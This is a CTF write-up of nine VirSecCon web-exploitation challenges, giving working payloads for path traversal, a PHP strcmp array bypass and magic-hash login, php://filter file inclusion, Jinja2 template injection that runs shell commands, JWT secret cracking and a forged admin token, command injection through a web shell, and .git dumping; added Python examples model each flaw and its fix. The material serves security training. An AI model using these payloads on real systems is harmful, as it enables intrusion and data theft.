Tags: exec web 

<h1 align="center">Web Exploitation</h1>

<h3>Hot Access 70 points</h3>

Access to all the latest modules, hot off the press! What can you access?

Connect here: http://jh2i.com:50016


The m parameter includes a file by path, so a directory traversal reads the site's .htaccess, which names a hidden directory:

http://jh2i.com:50016/?m=modules/../.htaccess

<pre>
<Directory /var/www/html>
    Options Indexes FollowSymLinks MultiViews
    AllowOverride All
    Order allow,deny
    allow from all
</Directory>

<Directory /var/www/html/sshh_dont_tell_i_hid_the_flag_here>
    AllowOverride All
</Directory>
</pre>

http://jh2i.com:50016/sshh_dont_tell_i_hid_the_flag_here/flag.txt
LLS{htaccess_can_control_what_you_access}

Flag: LLS{htaccess_can_control_what_you_access}

<h3>PHPJuggler 80 points</h3>

PHP is here to entertain again! They’ve shown you magic tricks, disappearing acts, and now… juggling!

Connect here: http://jh2i.com:50030.

<p align="center"><img src="../Files/juggler.png"></img></p>

PHP type juggling with strcmp():

Submit a POST request with flag[]=flag. strcmp() receives an array instead of a string, emits a warning and returns NULL, and NULL == 0 is true under loose comparison, so the check passes:

Warning: strcmp() expects parameter 1 to be string, array given in /var/www/html/index.php on line 6
You got it! That's the correct flag!
LLS{php_dropped_the_ball_again}

Flag: LLS{php_dropped_the_ball_again}

<h3>Magician 80 points</h3>

Show me a hat trick!

Connect here: http://jh2i.com:50000

<p align="center"><img src="../Files/magician.png"></img></p>

Magic hash, as in the WhiteHat Security and 247CTF challenges: the hash of the password is a hex string of the form 0e followed only by digits, which PHP's loose == treats as the number zero.

hash ==> 0e908377363673038390833004129775
password ==> f789bbc328a3d1a3e4UPoL

Flag: LLS{magic_hashes_make_for_a_good_show}
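PHPJuggler and Magician both come down to PHP's loose comparison. The Python below is an added illustration, not code from the writeup or from the challenge servers: it models the two PHP behaviours involved (strcmp() returning NULL for an array argument in PHP 5/7, and two "0e..." hex digests comparing equal as numeric zero) and shows the strict, constant-time check that closes both. The md5 inputs 240610708 and QNKCDZO are well-known magic-hash preimages; the secret values and the function names are constructed for the example.

```python
import hashlib
import hmac
import re

# Constructed demo inputs: two well-known strings whose md5 hex digest starts
# with "0e" and continues with digits only.
MAGIC_PLAINTEXTS = ["240610708", "QNKCDZO"]

# PHP's notion of a numeric string (sign, digits, optional fraction and exponent).
_NUMERIC_STR = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(h: str) -> bool:
    """A hex digest PHP would parse as 0 * 10^n: '0e' followed only by digits."""
    return re.fullmatch(r"0e\d+", h) is not None


def php_loose_equals(a: str, b: str) -> bool:
    """Model PHP's `==` on two strings: if both look numeric they are compared
    as numbers, so '0e123' == '0e456' (both evaluate to 0.0). This holds in
    PHP 5, 7 and 8 for two numeric strings."""
    if _NUMERIC_STR.match(a) and _NUMERIC_STR.match(b):
        return float(a) == float(b)
    return a == b


def php_strcmp_check(submitted, secret: str) -> bool:
    """Model the vulnerable pattern `if (strcmp($_POST['flag'], $secret) == 0)`.
    In PHP 5/7, strcmp() given an array warns and returns NULL, and NULL == 0
    is true, so flag[]=anything passes. (PHP 8 throws a TypeError instead.)"""
    if not isinstance(submitted, str):
        result = None                      # what strcmp() returns on an array
    else:
        result = (submitted > secret) - (submitted < secret)
    return result is None or result == 0   # loose comparison with 0


def hardened_check(submitted, secret: str) -> bool:
    """The fix: require a string (is_string / ===) and compare in constant
    time (hash_equals), never a loose == on hashes or strcmp() results."""
    if not isinstance(submitted, str):
        return False
    return hmac.compare_digest(submitted.encode(), secret.encode())


if __name__ == "__main__":
    for p in MAGIC_PLAINTEXTS:
        print(p, md5_hex(p), "magic" if is_magic_hash(md5_hex(p)) else "ordinary")
    print("loose  ==:", php_loose_equals(md5_hex("240610708"), md5_hex("QNKCDZO")))
    print("strict   :", hardened_check(md5_hex("240610708"), md5_hex("QNKCDZO")))
    print("strcmp array bypass:", php_strcmp_check(["flag"], "LLS{constructed}"))
    print("hardened array     :", hardened_check(["flag"], "LLS{constructed}"))
```

Running the script shows both md5 digests flagged as magic, the loose comparison reporting them equal and the strict one not, and the array input passing only the strcmp()-style check. The two one-line fixes in the hardened function are exactly what is missing in both challenges.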

<h3>GLHF 90 points</h3>

LMFAO! FLAG PLZ, THX!

Connect here: http://jh2i.com:50014

Local file inclusion (LFI): the php://filter wrapper base64-encodes the included file, so its PHP source comes back instead of being executed:

http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=index

<pre>
<?php
    if ( ! isset($_GET['page']) ){
        echo("we got nothing!");
        header('Location: /index.php?page=home');
    }
    else{
        include(str_replace('.php', '', $_GET['page']) . ".php" );
    }
?>
</pre>

The same trick with resource=FLAG, base64-decoded:

http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=FLAG

<pre>
<!DOCTYPE html>
<html>
    <head>
        <title> PHPLFIXYZ </title>
    </head>
    <body>

    <h1> FLAG???? </h1>

    <h1> WTF, PLZ??? </h1>

    <!-- SRY PHP LFI NBD -->

    </body>
</html>
<?php
    /*
    // _______________________________________________________________

                        LLS{lmfao_php_filters_ftw}

    // _______________________________________________________________
    */
?>
</pre>

Flag: LLS{lmfao_php_filters_ftw}
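Hot Access reads a file from a user-supplied path (modules/../.htaccess) and GLHF hands $_GET['page'] to include(); stripping '.php' does nothing against a php:// wrapper or a '..' segment. The Python below is an added example, not the challenge's code, reproducing GLHF's name mangling next to a hardened resolver that accepts only identifier-shaped names on an allowlist and confirms the resolved real path is still inside the base directory. The PAGES allowlist, the /var/www/html/pages base directory and the function names are constructed for the example.

```python
import os
import re

# Constructed allowlist standing in for the set of pages the app really has.
PAGES = {"home", "about"}

# Page names must look like a bare identifier: no slashes, dots, colons or NULs,
# which rules out php://filter/..., modules/../.htaccess and "%00" tricks alike.
_PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_include_path(page: str) -> str:
    """GLHF's logic: drop '.php', append '.php'. Wrappers and '..' pass straight through."""
    return page.replace(".php", "") + ".php"


def resolve_page(page: str, base_dir: str, allowed=PAGES):
    """Hardened resolution. Returns the absolute file to include, or None.

    1. syntactic check: the name is a plain identifier,
    2. semantic check: the name is on the allowlist,
    3. containment check: the real path is under base_dir (belt and braces,
       in case the allowlist ever grows a bad entry or base_dir has symlinks).
    """
    if not _PAGE_NAME.fullmatch(page):
        return None
    if page not in allowed:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    base = "/var/www/html/pages"   # constructed; the files need not exist for this demo
    for p in ["home", "FLAG", "modules/../.htaccess",
              "php://filter/convert.base64-encode/resource=index"]:
        print(f"{p!r:60} vulnerable -> {vulnerable_include_path(p)!r}")
        print(f"{'':60} hardened   -> {resolve_page(p, base)!r}")
```

The vulnerable function turns the php://filter URL into php://filter/convert.base64-encode/resource=index.php, which include() happily opens; the hardened one returns None for it, for the traversal, and for FLAG (not on the allowlist), and a real path only for home.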

<h3>MASK 90 points</h3>

Take off your mask.

Connect here: http://jh2i.com:50023.

<p align="center"><img src="../Files/mask.png"></img></p>

Server-side template injection (Flask/Jinja2 syntax):

test ==> {{7*7}} response 49

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

<p align="center"><img src="../Files/mask0.png"></img></p>

<p align="center"><img src="../Files/mask1.png"></img></p>

{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}

Flag: LLS{server_side_template_injection_unmasked}

<h3>JaWT 90 points</h3>

Check the admin's scratchpad!

Connect here: http://jh2i.com:50019/

<p align="center"><img src="../Files/jawt.png"></img></p>

Same challenge as in PicoCTF: crack the HS256 secret with crackjwt.py.

For john's token:
python crackjwt.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc" /media/sf_D_DRIVE/WORDLISTS/rockyou.dic
Cracking JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc
1648it [00:00, 6560.78it/s]
('Found secret key:', 'fuckit')

Token for admin, signed with the recovered secret:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.qfSqP1u-gAhG6r8Vfb31Fi5WkjYCxjRKhFEcLCde8O0

Set the jwt cookie to that value:

Hello admin!

Here is your JaWT scratchpad!

LLS{jawt_was_just_what_you_thought}

Flag: LLS{jawt_was_just_what_you_thought}

<h3>10 Character Web Shell 100 points</h3>

Only 10 char--

Connect here: http://jh2i.com:50001.

<pre>
<?php
    $c = $_GET[c];

    if(strlen($c) < 10){
        echo shell_exec($c);
    }else{
        echo "too long!";
    }
    highlight_file(__FILE__);
?>
</pre>

cat flag* is nine characters, so it passes the length check, and the shell glob expands to the flag file:

http://jh2i.com:50001/?c=cat%20flag*

<p align="center"><img src="../Files/web.png"></img></p>

Flag: LLS{you_really_can_see_in_the_dark}

<h3>Dairy Products 100 points</h3>

There is a new advertising campaign on the classic dairy company’s website. You need to steal their latest product.

Connect here: http://142.93.3.19:50008

Just use wget, since gitdumper.sh did not download the repo:

wget -r --no-parent http://142.93.3.19:50008/.git/

git status
git --no-pager log -p | grep LLS{
LLS{you_gitm_gotm_good_partner}

Flag: LLS{you_gitm_gotm_good_partner}

<h3>GET Encoded 125 points</h3>

I don't GET this%21 Do you%3F

Connect here: http://jh2i.com:50013

robots.txt points at /?debug:

<p align="center"><img src="../Files/encod.png"></img></p>

URL-encoding the parameter name (%73ystem decodes to system) still reaches the system parameter:

http://jh2i.com:50013/?%73ystem=ls

flag_that_you_could_never_guess.php
index.php
robots.txt

Machines hunt for more than humans do.

http://jh2i.com:50013/?%73ystem=cat%20flag%5fthat%5fyou%5fcould%5fnever%5fguess.php

<pre><?php
    // the flag is: LLS{i_gotcha_url_encoding}
?>
</pre><p>Machines hunt for more than humans do.</p>

Flag: LLS{i_gotcha_url_encoding}
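The lesson of GET Encoded is that the web server percent-decodes parameter names before the application sees them, so %73ystem and system are the same parameter, and any check that looks at the raw query string is comparing against the wrong form. The Python below is an added example, not the challenge's code: it shows the stdlib parser decoding the name, a naive filter that matches the denylist against the encoded string and misses, and a hardened version that normalises first (including a second layer such as %2573ystem). The BLOCKED_PARAMS denylist is constructed; the right fix is of course not to expose such a parameter at all.

```python
from urllib.parse import parse_qs, unquote

# Constructed denylist standing in for a naive parameter filter.
BLOCKED_PARAMS = {"system", "debug"}


def decoded_params(raw_query: str) -> dict:
    """parse_qs percent-decodes both names and values, exactly as PHP does when
    it builds $_GET, so the key here is 'system', not '%73ystem'."""
    return dict(parse_qs(raw_query, keep_blank_values=True))


def naive_filter_blocks(raw_query: str) -> bool:
    """The mistake: substring-match the denylist against the still-encoded query."""
    return any(name in raw_query for name in BLOCKED_PARAMS)


def _fully_decoded(name: str) -> str:
    """Peel percent-encoding until the string stops changing (catches %2573ystem)."""
    prev, cur = None, name
    while prev != cur:
        prev, cur = cur, unquote(cur)
    return cur


def hardened_filter_blocks(raw_query: str) -> bool:
    """Decode first, compare second: match on the canonical parameter names."""
    names = {_fully_decoded(n) for n in decoded_params(raw_query)}
    return bool(names & BLOCKED_PARAMS)


if __name__ == "__main__":
    for q in ["%73ystem=ls", "%2573ystem=ls", "page=home",
              "%73ystem=cat%20flag%5fthat%5fyou%5fcould%5fnever%5fguess.php"]:
        print(f"{q!r}")
        print(f"  decoded : {decoded_params(q)}")
        print(f"  naive   : {'blocked' if naive_filter_blocks(q) else 'allowed'}")
        print(f"  hardened: {'blocked' if hardened_filter_blocks(q) else 'allowed'}")
```

The naive filter lets every encoded variant through, which is the exact gap the challenge exercises; the hardened one blocks the single- and double-encoded forms and leaves page=home alone.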

<p align="left"><a href="https://github.com/Ne0Lux-C1Ph3r/WRITE-UP/blob/master/VirSecCon CTF/index.md">Return to the main menu</a></p>

Original writeup (https://github.com/Ne0Lux-C1Ph3r/WRITE-UP/blob/master/VirSecCon%20CTF/Web%20Exploitation/index.md).